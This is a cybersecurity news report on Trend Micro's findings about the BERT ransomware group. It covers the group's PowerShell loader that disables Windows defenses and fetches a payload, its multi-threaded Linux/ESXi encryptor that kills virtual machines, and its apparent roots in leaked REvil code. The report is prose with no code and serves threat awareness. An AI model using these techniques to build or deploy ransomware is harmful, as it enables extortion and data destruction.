New BERT Ransomware Unleashed: Multi-Threaded Attacks Hit Windows, Linux & ESXi with REvil Links
Ddos 
Security analysts at Trend Micro observed the rise of a previously unknown ransomware group now tracked as BERT—a threat actor deploying multi-threaded ransomware variants against victims across Asia, Europe, and the United States. The group’s targets include healthcare, technology, and event services sectors, marking them as a growing force in the ransomware ecosystem.
“BERT (tracked by Trend Micro as Water Pombero) is a newly emerged ransomware group targeting both Windows and Linux platforms,” the report confirms.
On Windows systems, BERT’s malware is deployed through a PowerShell loader (start.ps1) that disables defenses, elevates privileges, and downloads the payload (payload.exe) from an open directory hosted on an IP tied to ASN 39134, a Russian infrastructure provider.
“The PowerShell script escalates privileges, disables Windows Defender, the firewall, and user account control (UAC), then downloads and executes the ransomware,” the report explains.
The malware terminates services associated with web servers and databases before initiating encryption using AES, appending the extension .encryptedbybert and dropping a ransom note.
Trend Micro also highlights the presence of Russian-language comments within the PowerShell script—potentially indicating the origin or coding influence of the threat actors.
BERT’s Linux variant, discovered in May, is even more active. It launches with up to 50 concurrent threads to rapidly encrypt target directories and can forcibly shut down ESXi virtual machines to ensure maximum impact.
“When executed without command line parameters, it will proceed to shutdown virtual machines… [and] force the termination of all running VM processes,” Trend Micro warns.
The ransomware appends the .encrypted_by_bert extension and drops a Base64-encoded ransom note, displaying a banner summarizing encrypted files.
Its modular design uses a JSON-formatted configuration embedded in the binary, containing keys, extensions, and ransom notes—similar to techniques observed in modern ransomware toolkits.
“This version uses a JSON-formatted configuration embedded in the binary—a typical trait of most modern ransomware,” the report states.
Trend’s investigation revealed that older variants of BERT relied on a two-stage encryption process—first collecting file paths, then encrypting. In contrast, newer samples use a ConcurrentQueue and spawn DiskWorkers per drive, allowing encryption to start immediately as files are discovered.
“This enables the ransomware to begin encrypting files as soon as they are discovered, unlike the older version,” the researchers explain.
Trend Micro’s analysts note code similarities between BERT and REvil’s Linux variant, which was publicly leaked in 2021. These connections suggest the group may have built upon existing ransomware frameworks used in prior high-profile attacks against ESXi and Linux systems.
“Further investigation suggests that the group may have derived from the Linux variant of REvil,” the report adds.
Related Posts:
- Notorious ransomware gang REvil was destroyed by Russia
- Four REvil Hackers Sentenced: St. Petersburg Court Imposes Years in Penal Colony
- VMware ESXi Vulnerability Exposes Thousands of Servers to Ransomware
- Stealthy and Persistent: New Ransomware Tactics Target VMware ESXi
- North Korean Cyber Espionage Group Kimsuky Exploits University Website in Watering Hole Attack
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
